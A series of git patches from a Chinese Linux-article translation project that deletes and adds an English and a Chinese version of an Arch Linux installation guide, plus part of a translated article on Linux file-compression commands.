前面提到的常用压缩命令以同样的方式工作 。会权衡文件内容压缩程度 ,压缩花费的时间 ,压缩文件在其他你需要使用的系统上的兼容性 。 - 一些时候压缩一个文件并不会花费很多时间和性能 。在下面的例子中 ,被压缩的文件回避原始文件要大 。当在一个不是很普遍的情况下 ,尤其是在文件内容达到一定等级的随机度 。 - - ``` - $ time zip bigfile.zip bigfile - adding: bigfile (default 0% ) - real 0m0.055s - user 0m0.000s - sys 0m0.016s - $ ls -l bigfile* - -rw-r--r-- 1 root root 0 12月 20 22:36 bigfile - -rw------- 1 root root 164 12月 20 22:41 bigfile.zip - ``` - 注意压缩后的文件 ( bigfile.zip ) 比源文件 ( bigfile ) 要大 。如果压缩增加了文件的大小或者减少的很少的百分比 ,那就只剩下在线备份的好处了 。如果你在压缩文件后看到了下面的信息 。你不会得到大多的益处 。 - ( defalted 1% ) - - 文件内容在文件压缩的过程中有很重要的作用 。在上面文件大小增加的例子中是因为文件内容过于随机 。压缩一个文件内容只包含 0 的文件 。你会有一个相当震惊的压缩比 。在如此极端的情况下 ,三个常用的压缩工具都有非常棒的效果 。 - - -rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt - -rw-rw-r-- 1 shs shs 49 Dec 8 17:28 zeroes.txt.bz2 - -rw-rw-r-- 1 shs shs 10219 Dec 8 17:28 zeroes.txt.gz - -rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz - -rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip - - 在压缩拉的文本文件时 ,你会发现和重要的不同 。 - $ ls -l textfile* - -rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile - -rw-rw-r-- 1 shs shs 1519807 Dec 11 18:41 textfile.bz2 - -rw-rw-r-- 1 shs shs 1977669 Dec 11 18:41 textfile.gz - -rw-rw-r-- 1 shs shs 1024700 Dec 11 18:41 textfile.xz - -rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip - - 在这种情况下 ,XZ 相较于其他压缩文件有效的减小了文件的大小 ,对于第二的 bzip2 命令也有很大的提高 。 - - ##查看压缩文件 - 以 more 结尾的命令能够让你查看压缩文件而不解压文件 。 - - bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text - lzmore (1) - view xz or lzma compressed (text) files - xzmore (1) - view xz or lzma compressed (text) files - zmore (1) - file perusal filter for crt viewing of compressed text - - 这些命令在大多数工作中被使用 ,自从不得不使文件解压缩而只为了显示给用户 。在另一方面 ,留下被解压的文件在系统中 。这些命令简单的使文件解压缩 。 - $ xzmore textfile.xz | head -1 - Here is the agenda for tomorrow's staff meeting: \ No newline at end of file From a282ffeb66fb999cf5f5d2a3506e4645d1139921 Mon Sep 17 00:00:00 2001 From: wenwensnow <963555237@qq.com> Date: Sat, 23 Dec 2017 22:17:12 +0800 Subject: [PATCH 0762/1627] Delete 20171211 How to Install Arch Linux [Step by Step Guide].md --- ...Install Arch Linux [Step by Step Guide].md | 284 ------------------ 1 file changed, 284 deletions(-) delete mode 100644 sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md diff --git a/sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md b/sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md deleted file mode 100644 index 79d165febc..0000000000 --- a/sources/tech/20171211 How to Install Arch Linux [Step by Step Guide].md +++ /dev/null @@ -1,284 +0,0 @@ -translating by wenwensnow -How to Install Arch Linux [Step by Step Guide] -====== -**Brief: This tutorial shows you how to install Arch Linux in easy to follow steps.** - -[Arch Linux][1] is a x86-64 general-purpose Linux distribution which has been popular among the [DIY][2] enthusiasts and hardcore Linux users. The default installation covers only a minimal base system and expects the end user to configure and use it. Based on the KISS - Keep It Simple, Stupid! principle, Arch Linux focus on elegance, code correctness, minimalist system and simplicity. - -Arch Linux supports the Rolling release model and has its own package manager - [pacman][3]. With the aim to provide a cutting-edge operating system, Arch never misses out to have an up-to-date repository. The fact that it provides a minimal base system gives you a choice to install it even on low-end hardware and then install only the required packages over it. - -Also, its one of the most popular OS for learning Linux from scratch. If you like to experiment with a DIY attitude, you should give Arch Linux a try. It's what many Linux users consider a core Linux experience. - -In this article, we will see how to install and set up Arch Linux and then a desktop environment over it. - -## How to install Arch Linux - -![How to install Arch Linux][4] - -![How to install Arch Linux][5] - -The method we are going to discuss here **wipes out existing operating system** (s) from your computer and install Arch Linux on it. So if you are going to follow this tutorial, make sure that you have backed up your files or else you'll lose all of it. You have been warned. - -But before we see how to install Arch Linux from a USB, please make sure that you have the following requirements: - -### Requirements for installing Arch Linux: - - * A x86_64 (i.e. 64 bit) compatible machine - * Minimum 512 MB of RAM (recommended 2 GB) - * At least 1 GB of free disk space (recommended 20 GB for basic usage) - * An active internet connection - * A USB drive with minimum 2 GB of storage capacity - * Familiarity with Linux command line - - - -Once you have made sure that you have all the requirements, let's proceed to install Arch Linux. - -### Step 1: Download the ISO - -You can download the ISO from the [official website][6]. Arch Linux requires a x86_64 (i.e. 64 bit) compatible machine with a minimum of 512 MB RAM and 800 MB disk space for a minimal installation. However, it is recommended to have 2 GB of RAM and at least 20 GB of storage for a GUI to work without hassle. - -### Step 2: Create a live USB of Arch Linux - -We will have to create a live USB of Arch Linux from the ISO you just downloaded. - -If you are on Linux, you can use **dd command** to create a live USB. Replace /path/to/archlinux.iso with the path where you have downloaded ISO file, and /dev/sdx with your drive in the example below. You can get your drive information using [lsblk][7] command. -``` -dd bs=4M if=/path/to/archlinux.iso of=/dev/sdx status=progress && sync -``` - -On Windows, there are several tools to create a live USB. The recommended tool is Rufus. We have already covered a tutorial on [how to create a live USB of Antergos Linux using Rufus][8] in the past. Since Antergos is based on Arch, you can follow the same tutorial. - -### Step 3: Boot from the live USB - -Once you have created a live USB for Arch Linux, shut down your PC. Plugin your USB and boot your system. While booting keep pressing F2, F10 or F1dependinging upon your system) to go into boot settings. In here, select to boot from USB or removable disk. - -Once you select that, you should see an option like this: - -![Arch Linux][4] - -![Arch Linux][9] -Select Boot Arch Linux (x86_64). After various checks, Arch Linux will boot to login prompt with root user. - -Select Boot Arch Linux (x86_64). After various checks, Arch Linux will boot to login prompt with root user. - -Next steps include partitioning disk, creating the filesystem and mounting it. - -### Step 4: Partitioning the disks - -The first step includes partitioning your hard disk. A single root partition is the simplest one where we will create a root partition (/), a swapfile and home partition. - -I have a 19 GB disk where I want to install Arch Linux. To create a disk, type -``` -fdisk /dev/sda -``` - -Type "n" for a new partition. Type in "p" for a primary partition and select the partition number. - -The First sector is automatically selected and you just need to press Enter. For Last sector, type the size you want to allocate for this partition. - -Create two more partitions similarly for home and swap, and press 'w' to save the changes and exit. - -![root partition][4] - -![root partition][10] - -### Step 4: Creating filesystem - -Since we have created 3 different partitions, the next step is to format the partition and create a filesystem. - -We will use mkfs for root and home partition and mkswap for creating swap space. We are formatting our disk with ext4 filesystem. -``` -mkfs.ext4 /dev/sda1 -mkfs.ext4 /dev/sda3 - -mkswap /dev/sda2 -swapon /dev/sda2 -``` - -Lets mount these filesystems to root and home -``` -mount /dev/sda1 /mnt -mkdir /mnt/home -mount /dev/sda3 /mnt/home -``` - -### Step 5: Installation - -Since we have created partitioning and mounted it, let's install the base package. A base package contains all the necessary package to run a system, some of which are the GNU BASH shell, data compression tool, file system utilities, C library, compression tools, Linux kernels and modules, library packages, system utilities, USB devices utilities, vi text editor etc. -``` -pacstrap /mnt base base-devel -``` - -### **Step 6: Configuring the system** - -Generate a fstab file to define how disk partitions, block devices or remote file systems are mounted into the filesystem. -``` -genfstab -U /mnt >> /mnt/etc/fstab -``` - -Change root into the new system, this allows changing the root directory for the current running process and the child process. -``` -arch-chroot /mnt -``` - -Some systemd tools which require an active dbus connection can not be used inside a chroot, hence it would be better if we exit from it. To exit chroot, simpy use the below command: -``` -exit -``` - -### Step 7. Setting Timezone - -Use below command to set the time zone. -``` -ln -sf /usr/share/// /etc/localtime -``` - -To get a list of zone, type -``` -ls /usr/share/zoneinfo -``` - -Run hwclock to set the hardware clock. -``` -hwclock --systohc --utc -``` - -### Step 8. Setting up Locale. - -File /etc/locale.gen contains all the local settings and system language in a commented format. Open the file using vi editor and un-comment the language you prefer. I had done it for **en_GB.UTF-8**. - -Now generate the locale config in /etc directory file using the commands below: -``` -locale-gen -echo LANG=en_GB.UTF-8 > /etc/locale.conf -export LANG=en_GB.UTF-8 -``` - -### Step 9. Installing bootloader, setting up hostname and root password - -Create a /etc/hostname file and add a matching entry to host. - -127.0.1.1 myhostname.localdomain myhostname - -I am adding ItsFossArch as a hostname: -``` -echo ItsFossArch > /etc/hostname -``` - -and then to the /etc/hosts file. - -To install a bootloader use below commands : -``` -pacman -S grub -grub-install /dev/sda -grub-mkconfig -o /boot/grub/grub.cfg -``` - -To create root password, type -``` -passwd -``` - -and enter your desired password. - -Once done, update your system. Chances are that you already have an updated system since you have downloaded the latest ISO file. -``` -pacman -Syu -``` - -Congratulations! You have successfully installed a minimal command line Arch Linux. - -In the next step, we will see how to set up a desktop environment or Graphical User Interface for the Arch Linux. I am a big fan of GNOME desktop environment, and we will be working on installing the same. - -### Step 10: Install a desktop environment (GNOME in this case) - -Before you can install a desktop environment, you will need to configure the network first. - -You can see the interface name with below command: -``` -ip link -``` - -![][4] - -![][11] - -For me, it's **enp0s3.** - -Add the following entries in the file -``` -vi /etc/systemd/network/enp0s3.network - -[Match] -name=en* -[Network] -DHCP=yes -``` - -Save and exit. Restart your systemd network for the changes to reflect. -``` -systemctl restart systemd-networkd -systemctl enable systemd-networkd -``` - -And then add the below two entries in /etc/resolv.conf file. -``` -nameserver 8.8.8.8 -nameserver 8.8.4.4 -``` - -Next step is to install X environment. - -Type the below command to install the Xorg as display server. -``` -pacman -S xorg xorg-server -``` - -gnome contains the base GNOME desktop. gnome-extra contains GNOME applications, archive manager, disk manager, text editors and more. -``` -pacman -S gnome gnome-extra -``` - -The last step includes enabling the display manager GDM for Arch. -``` -systemctl start gdm.service -systemctl enable gdm.service -``` - -Restart your system and you can see the GNOME login screen. - -## Final Words on Arch Linux installation - -A similar approach has been demonstrated in this video (watch in full screen to see the commands) by It's FOSS reader Gonzalo Tormo: - -You might have realized by now that installing Arch Linux is not as easy as [installing Ubuntu][12]. However, with a little patience, you can surely accomplish it and then tell the world that you use Arch Linux. - -Arch Linux installation itself provides a great deal of learning. And once you have installed it, I recommend referring to its comprehensive [wiki][13] where you can find steps to install various other desktop environments and learn more about the OS. You can keep playing with it and see how powerful Arch is. - -Let us know in the comments if you face any difficulty while installing Arch Linux. - --------------------------------------------------------------------------------- - -via: https://itsfoss.com/install-arch-linux/ - -作者:[Ambarish Kumar][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://itsfoss.com/author/ambarish/ -[1] https://www.archlinux.org/ -[2] https://en.wikipedia.org/wiki/Do_it_yourself -[3] https://wiki.archlinux.org/index.php/pacman -[4] data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= -[5] https://itsfoss.com/wp-content/uploads/2017/12/install-arch-linux-featured-800x450.png -[6] https://www.archlinux.org/download/ -[7] https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s1-sysinfo-filesystems -[8] https://itsfoss.com/live-usb-antergos/ -[9] https://itsfoss.com/wp-content/uploads/2017/11/1-2.jpg -[10] https://itsfoss.com/wp-content/uploads/2017/11/4-root-partition.png -[11] https://itsfoss.com/wp-content/uploads/2017/12/11.png -[12] https://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/ -[13] https://wiki.archlinux.org/ From 29b49543db06c80d7e4f84fc69ce1fa961cdf180 Mon Sep 17 00:00:00 2001 From: wenwensnow <963555237@qq.com> Date: Sat, 23 Dec 2017 22:38:09 +0800 Subject: [PATCH 0763/1627] Create 20171211 How to Install Arch Linux [Step by Step Guide].md --- ...Install Arch Linux [Step by Step Guide].md | 329 ++++++++++++++++++ 1 file changed, 329 insertions(+) create mode 100644 translated/tech/20171211 How to Install Arch Linux [Step by Step Guide].md diff --git a/translated/tech/20171211 How to Install Arch Linux [Step by Step Guide].md b/translated/tech/20171211 How to Install Arch Linux [Step by Step Guide].md new file mode 100644 index 0000000000..0222458309 --- /dev/null +++ b/translated/tech/20171211 How to Install Arch Linux [Step by Step Guide].md @@ -0,0 +1,329 @@ +如何安装 Arch Linux [详细安装步骤指导] +====== +**简要说明:这一教程会教你如何用简单步骤安装Arch Linux.** +[Arch Linux][1] 是一个在喜欢自己定制Linux系统的用户和Linux爱好者中很受欢迎的x86-64多用途发行版。默认的安装文件只含有一个最基本的系统,它希望使用者自己配置并使用Arch系统。根据KISS - 使它保持简单这一原则 (愚蠢!),Arch Linux 是一个优雅,注重源代码正确性,体积尽可能小,简洁的操作系统。 + + + Arch 支持滚动升级并且有自己的软件包管理器 - [pacman][3]。为了始终让自己处在操作系统的前沿,Arch从不错过任何一个最新的源。实际上,默认安装只含有一个基本的操作系统,使得你在低端硬件上也能安装Arch,并且安装过程中只会安装系统正常运行所必须的包。 + + + 同时,它也是从头开始学习Linux的一个很好的操作系统。如果你想自己动手安装Linux,你不妨尝试一下Arch Linux. 这是许多Linux 用户觉得很有益处的一次体验。 + + + 在这篇文章里,我们会了解到如何安装,配置Arch并安装桌面环境。 + + + ## 如何安装Arch Linux + + + ![How to install Arch Linux][4] + + ![How to install Arch Linux][5] + + 我们在这里讨论的安装方法是从你的电脑上"完全删除已有的操作系统" ,而后安装Arch Linux. 如果你想根据这一教程安装Arch,确保你已经备份了所有文件。否则你就会失去全部数据,这里已经提醒过你了。 + + + 在你从USB上安装Arch 之前,确保你已经满足了以下条件: + + ### 安装Arch Linux 的条件: + + + * 一个兼容x86_64(例如 64位)的机器 + * 最小 512M 内存(建议 2GB) + * 最少 1G 的磁盘空余空间 (日常使用推荐 20GB) + * 可以访问网络 + * A USB drive with minimum 2 GB of storage capacity 至少有2G存储空间的U盘 + * Familiarity with Linux command line 熟悉Linux 命令行 + + + 一旦你确认满足所有条件,就可以开始安装Arch Linux了。 + + + ### 第一步:下载ISO 文件 + + 你可以从官网上下载ISO。安装Arch Linux 需要一个至少有512M内存和800M磁盘空间,并兼容x86_64的机器。不过,建议至少有2G内存和20G磁盘空间,这样安装桌面环境时就不会遇到麻烦。 + + + ### 第二步:创建一个Arch Linux 的 live USB + + 我们需要用你刚刚下载的ISO文件创建一个Arch Linux 的live USB。 + + 如果你使用Linux,你可以用 **dd** 命令来创建live USB。 记得参考下面的例子将 /path/to/archlinux.iso 改成你ISO文件的实际存储位置,/dev/sdx 改成你的磁盘设备号 (i.e /dev/sdb)。你可以通过 [lsblk][7] 命令来了解你的设备信息。 + + + ``` + dd bs=4M if=/path/to/archlinux.iso of=/dev/sdx status=progress && sync + ``` + 在Windows下,有多种方法来创建live USB。 推荐工具是 Rufus。我们之前已经有如何使用这一工具创建Antergos live USB的教程。因为Antergos发行版是基于Arch的,你可以使用同一教程。 + + ### 步骤三:从 live USB 上启动 + + 一旦你已经创建了Arch Linux 的live USB,关闭你的电脑。插上你的U盘然后启动系统。在开机启动时,持续按F2,F10或F1(根据你的电脑型号)进入启动设置。在这里,选择从U盘或可移除设备启动 这一项。 + + 一旦你选择了它,你会看到这样一个选项: + + ![Arch Linux][4] + + ![Arch Linux][9] + + 选择启动 Arch Linux (x86_64)。检查后,Arch Linux 会启动root用户的命令行界面。 + Select Boot Arch Linux (x86_64). After various checks, Arch Linux will boot to login prompt with root user. + + 接下来的步骤会包括磁盘分区,创建文件系统并挂载它。 + + ### 第四步:磁盘分区 + + 第一步就是给你的硬盘分区。只有一个硬盘很简单,就在它上面创建根分区(/)分区和home分区。 + + + + 我有一个19G的硬盘,我想在这儿安装Arch Linux。为了创建分区,输入: + + ``` + fdisk /dev/sda + ``` + + 按 "n" 创建新分区。按"p" 创建主分区,然后选择分区号。 + + 第一扇区会被自动选择,你只要按回车键。在确定分区的最后一个扇区时,请输入这一分区的大小。 + + + 用相同的方法为home和swap创建两个分区,按"w" 来保存修改并退出。 + + + ![root partition][4] + + ![root partition][10] + + + ### 第四步:创建文件系统 + + 因为我们已经有了三个分区,接下来就是格式化分区并创建文件系统 + + 我们 用mkfs命令在root和home分区上创建文件系统,用mkswap创建swap空间。我们用ext4文件系统格式化磁盘。 + + ``` + mkfs.ext4 /dev/sda1 + mkfs.ext4 /dev/sda3 + + mkswap /dev/sda2 + swapon /dev/sda2 + ``` + 将这些分区挂载在root 和 home下 + + ``` + mount /dev/sda1 /mnt + mkdir /mnt/home + mount /dev/sda3 /mnt/home + ``` + + ### 第五步:安装 + + 我们已经创建分区并挂载了分区,开始安装最基本的包。一个最基本的软件包包括所有系统运行所必需的部件。比如有GNU BASH shell,文件压缩工具,文件系统管理工具,C语言库,压缩工具,Linux 内核和 模块,系统工具,USB管理工具,Vi 文本编辑器等等。 + + + ``` + pacstrap /mnt base base-devel + ``` + + ### **第六步:配置系统** + + + 生成一个 fstab 文件来规定磁盘分区,块设备,或者远程文件系统是如何挂载进文件系统中的。 + + ``` + genfstab -U /mnt >> /mnt/etc/fstab + ``` + + 进入chroot环境,这样可以为当前进程以及子进程切换当前根目录。 + + ``` + arch-chroot /mnt + ``` + 一些需要与数据总线保持连接的系统工具不能再chroot环境下使用,所以需要从当前环境退出。想要退出chroot,就用下面的命令: + + ``` + exit + ``` + + ### 第七步: 设定时区 + + + 用下面这条命令设定时区 + + ``` + ln -sf /usr/share/// /etc/localtime + ``` + 获取时区列表,输入 + + ``` + ls /usr/share/zoneinfo + ``` + + + 用 hwclock 命令设定硬件时钟 + ``` + hwclock --systohc --utc + ``` + + + ### 第八步: 设置地区 + + 文件 /etc/locale.gen 在注释里包含了所有地区和系统语言设置。用 Vi打开它,然后去掉你希望选择语言前面的注释。 我选择了 **en_GB.UTF-8**。 + + + 现在用下面的命令在 /etc 文件夹里生成 关于地区的配置文件: + + + ``` + locale-gen + echo LANG=en_GB.UTF-8 > /etc/locale.conf + export LANG=en_GB.UTF-8 + ``` + + ### 第九步 :安装 bootloader,设置主机名和root 密码 + + + 创建 /etc/hostname 文件 然后添加一个对应的主机名 + + + 127.0.1.1 myhostname.localdomain myhostname + + 我添加了 ItsFossArch 作为我的主机名: + + ``` + echo ItsFossArch > /etc/hostname + ``` + 然后也将它添加到 /etc/hosts 中 + + 为了安装 bootloader 使用下面的命令: + + + ``` + pacman -S grub + grub-install /dev/sda + grub-mkconfig -o /boot/grub/grub.cfg + ``` + + 创建root密码,输入: + + ``` + passwd + ``` + + 输入你想要的密码。 + + + 完成之后,更新你的系统。但很有可能你的系统已经是最新的,因为你下载的是最近的ISO。 + + + ``` + pacman -Syu + ``` + + 恭喜! 你已经安装了 Arch Linux 的命令行版本。 + + + 接下来,我们会了解到如何为Arch设置并安装一个桌面环境。我很喜欢GNOME的桌面环境,所以在这儿也就选择了这个。 + + + ### 第十步:安装桌面 (这一例子中是GNOME) + + 在你安装桌面之前,你需要先设置网络。 + + 你可以用下面的命令看见你的端口: + + ``` + ip link + ``` + + ![][4] + + ![][11] + + 在我的电脑上,端口名是 **enp0s3.** + + + 将下面这一段加进文件中 + + ``` + vi /etc/systemd/network/enp0s3.network + + [Match] + name=en* + [Network] + DHCP=yes + ``` + 保存并退出。重启网络来应用你刚才的改动。 + + ``` + systemctl restart systemd-networkd + systemctl enable systemd-networkd + ``` + 将下面这两句话加进 /etc/resolv.conf 中 + + ``` + nameserver 8.8.8.8 + nameserver 8.8.4.4 + ``` + + 下一步是安装 X 环境。 + + 输入下面的命令安装 Xorg,并将它作为显示服务器。 + + ``` + pacman -S xorg xorg-server + ``` + gnome 包含了基本的 GNOME桌面,gnome-extra 则包含 GNOME 应用,压缩包管理器,磁盘管理器,文本编辑器和其他的应用。 + + ``` + pacman -S gnome gnome-extra + ``` + + 最后一步是在Arch上开启GDM显示管理器。 + + ``` + systemctl start gdm.service + systemctl enable gdm.service + ``` + 重启你的系统,你就会看见 GNOME的登录界面。 + + + ## Arch Linux 安装总结 + + 我们在视频中展示了一个由Foss读者 Gonzalo Tormo 提供的相似的安装方法(全屏观看,能更好的看清命令): + + + 你也许意识到安装Arch不像安装Ubuntu 一样简单。不过,只要有耐心,你一定可以安装好它,并且向全世界宣布你在用Arch Linux. + + + Arch Linux 安装过程本身就是一个学习的机会。一旦安装完毕,我建议你参考它的Wiki去尝试其他的桌面环境,从而更深入了解这一操作系统。你可以探索它,发现它的强大之处。 + + + 如果你在安装Arch 的过程中遇到任何问题,请在评论中给我们留言。 + + + -------------------------------------------------------------------------------- + + via: https://itsfoss.com/install-arch-linux/ + + 作者:[Ambarish Kumar][a] + 译者:[译者ID](https://github.com/译者ID) + 校对:[校对者ID](https://github.com/校对者ID) + + 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + + [a]:https://itsfoss.com/author/ambarish/ + [1] https://www.archlinux.org/ + [2] https://en.wikipedia.org/wiki/Do_it_yourself + [3] https://wiki.archlinux.org/index.php/pacman + [4] data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= + [5] https://itsfoss.com/wp-content/uploads/2017/12/install-arch-linux-featured-800x450.png + [6] https://www.archlinux.org/download/ + [7] https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s1-sysinfo-filesystems + [8] https://itsfoss.com/live-usb-antergos/ + [9] https://itsfoss.com/wp-content/uploads/2017/11/1-2.jpg + [10] https://itsfoss.com/wp-content/uploads/2017/11/4-root-partition.png + [11] https://itsfoss.com/wp-content/uploads/2017/12/11.png + [12] https://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/ + [13] https://wiki.archlinux.org/ From c9f8d59d581fda89a86c49a9bc343adbb4ebe0e4 Mon Sep 17 00:00:00 2001 From: Ocputs <15391606236@163.com> Date: Sat, 23 Dec 2017 22:47:09 +0800 Subject: [PATCH 0764/1627] rm source , change GITHUB's ID --- ... the most out of Linux file compression.md | 146 ------------------ ... the most out of Linux file compression.md | 2 +- 2 files changed, 1 insertion(+), 147 deletions(-) delete mode 100644 sources/tech/20171214 How to squeeze the most out of Linux file compression.md diff --git a/sources/tech/20171214 How to squeeze the most out of Linux file compression.md b/sources/tech/20171214 How to squeeze the most out of Linux file compression.md deleted file mode 100644 index 0d573d3261..0000000000 --- a/sources/tech/20171214 How to squeeze the most out of Linux file compression.md +++ /dev/null @@ -1,146 +0,0 @@ - Translating ---> Octopus - -How to squeeze the most out of Linux file compression -====== -If you have any doubt about the many commands and options available on Linux systems for file compression, you might want to take a look at the output of the **apropos compress** command. Chances are you'll be surprised by the many commands that you can use for compressing and decompressing files, as well as for comparing compressed files, examining and searching through the content of compressed files, and even changing a compressed file from one format to another (i.e., .z format to .gz format). - -You're likely to see all of these entries just for the suite of bzip2 compression commands. Add in zip, gzip, and xz, and you've got a lot of interesting options. -``` -$ apropos compress | grep ^bz -bzcat (1) - decompresses files to stdout -bzcmp (1) - compare bzip2 compressed files -bzdiff (1) - compare bzip2 compressed files -bzegrep (1) - search possibly bzip2 compressed - files for a regular expression -bzexe (1) - compress executable files in place -bzfgrep (1) - search possibly bzip2 compressed - files for a regular expression -bzgrep (1) - search possibly bzip2 compressed - files for a regular expression -bzip2 (1) - a block-sorting file compressor, - v1.0.6 -bzless (1) - file perusal filter for crt viewing - of bzip2 compressed text -bzmore (1) - file perusal filter for crt viewing - of bzip2 compressed text - -``` - -On my Ubuntu system, over 60 commands were listed in response to the apropos compress command. - -### Compression algorithms - -Compression is not a one-size-fits-all issue. Some compression tools are "lossy," such as those used to reduce the size of mp3 files while allowing listeners to have what is nearly the same musical experience as listening to the originals. But algorithms used on the Linux command line to compress or archive user files have to be able to reproduce the original content exactly. In other words, they have to be lossless. - -How is that done? It's easy to imagine how 300 of the same character in a row could be compressed to something like "300X," but this type of algorithm wouldn't be of much benefit for most files because they wouldn't contain long sequences of the same character any more than they would completely random data. Compression algorithms are far more complex and have only been getting more so since compression was first introduced in the toddler years of Unix. - -### Compression commands on Linux systems - -The commands most commonly used for file compression on Linux systems include zip, gzip, bzip2 and xz. All of those commands work in similar ways, but there are some tradeoffs in terms of how much the file content is squeezed (how much space you save), how long the compression takes, and how compatible the compressed files are with other systems you might need to use them on. - -Sometimes the time and effort of compressing a file doesn't pay off very well. In the example below, the "compressed" file is actually larger than the original. While this isn't generally the case, it can happen -- especially when the file content approaches some degree of randomness. -``` -$ time zip bigfile.zip bigfile - adding: bigfile (deflated 0%) - -real 1m6.310s -user 0m52.424s -sys 0m2.288s -$ -$ ls -l bigfile* --rw-rw-r-- 1 shs shs 1073741824 Dec 8 10:06 bigfile --rw-rw-r-- 1 shs shs 1073916184 Dec 8 11:39 bigfile.zip - -``` - -Note that the compressed version of the file (bigfile.zip) is actually a little larger than the original file. If compression increases the size of a file or reduces its size by some very small percentage, the only benefit may be that you may have a convenient online backup. If you see a message like this after compressing a file, you're not gaining much. -``` -(deflated 1%) - -``` - -The content of a file plays a large role in how well it will compress. The file that grew in size in the example above was fairly random. Compress a file containing only zeroes, and you'll see an amazing compression ratio. In this admittedly extremely unlikely scenario, all three of the commonly used compression tools do an excellent job. -``` --rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt --rw-rw-r-- 1 shs shs 49 Dec 8 17:28 zeroes.txt.bz2 --rw-rw-r-- 1 shs shs 10219 Dec 8 17:28 zeroes.txt.gz --rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz --rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip - -``` - -While impressive, you're not likely to see files with over 10 million bytes compressing down to fewer than 50, since files like these are extremely unlikely. - -In this more realistic example, the size differences are altogether different -- and not very significant -- for a fairly small jpg file. -``` --rw-r--r-- 1 shs shs 13522 Dec 11 18:58 image.jpg --rw-r--r-- 1 shs shs 13875 Dec 11 18:58 image.jpg.bz2 --rw-r--r-- 1 shs shs 13441 Dec 11 18:58 image.jpg.gz --rw-r--r-- 1 shs shs 13508 Dec 11 18:58 image.jpg.xz --rw-r--r-- 1 shs shs 13581 Dec 11 18:58 image.jpg.zip - -``` - -Do the same thing with a large text file, and you're likely to see some significant differences. -``` -$ ls -l textfile* --rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile --rw-rw-r-- 1 shs shs 1519807 Dec 11 18:41 textfile.bz2 --rw-rw-r-- 1 shs shs 1977669 Dec 11 18:41 textfile.gz --rw-rw-r-- 1 shs shs 1024700 Dec 11 18:41 textfile.xz --rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip - -``` - -In this case, xz reduced the size considerably more than the other commands with bzip2 coming in second. - -### Looking at compressed files - -The *more commands (bzmore and others) allow you to view the contents of compressed files without having to uncompress them first. -``` -bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text -lzmore (1) - view xz or lzma compressed (text) files -xzmore (1) - view xz or lzma compressed (text) files -zmore (1) - file perusal filter for crt viewing of compressed text - -``` - -These commands are all doing a good amount of work, since they have to decompress a file's content just to display it to you. They do not, on the other hand, leave uncompressed file content on the system. They simply decompress on the fly. -``` -$ xzmore textfile.xz | head -1 -Here is the agenda for tomorrow's staff meeting: - -``` - -### Comparing compressed files - -While several of the compression toolsets include a diff command (e.g., xzdiff), these tools pass the work off to cmp and diff and are not doing any algorithm-specific comparisons. For example, the xzdiff command will compare bz2 files as easily as it will compare xz files. - -### How to choose the best Linux compression tool - -The best tool for the job depends on the job. In some cases, the choice may depend on the content of the data being compressed, but it's more likely that your organization's conventions are just as important unless you're in a real pinch for disk space. The best general suggestions seem to be these: - - **zip** is best when files need to be shared with or used on Windows systems. - - **gzip** may be best when you want the files to be usable on any Unix/Linux system. Though bzip2 is becoming nearly as ubiquitous, it is likely to take longer to run. - - **bzip2** uses a different algorithm than gzip and is likely to yield a smaller file, but they take a little longer to get the job done. - - **xz** generally offers the best compression rates, but also takes considerably longer to run. It's also newer than the other tools and may not yet exist on all the systems you need to work with. - -### Wrap-up - -There are a number of choices when it comes to how to compress files and only a few situations in which they don't yield valuable disk space savings. - - --------------------------------------------------------------------------------- - -via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html - -作者:[Sandra Henry-Stocker][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.networkworld.com diff --git a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md b/translated/tech/20171214 How to squeeze the most out of Linux file compression.md index 1b6eeeccda..66a6ab980a 100644 --- a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md +++ b/translated/tech/20171214 How to squeeze the most out of Linux file compression.md @@ -106,7 +106,7 @@ $ xzmore textfile.xz | head -1 -------------------------------------------------------------------------------- via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html -作者 :[ Sandra Henry-Stocker ][1] 译者:[ Octopus ][2] 校对:校对者ID +作者 :[ Sandra Henry-Stocker ][1] 译者:[ singledp ][2] 校对:校对者ID 本文由 [ LCTT ][3]原创编译,Linux中国 荣誉推出 From ed1f0eb1fc8dfb91ff49172664af30e307cf0996 Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 24 Dec 2017 07:21:33 +0800 Subject: [PATCH 0765/1627] PRF&PUB:20160922 A Linux users guide to Logical Volume Management.md MIME-Version: 1.0 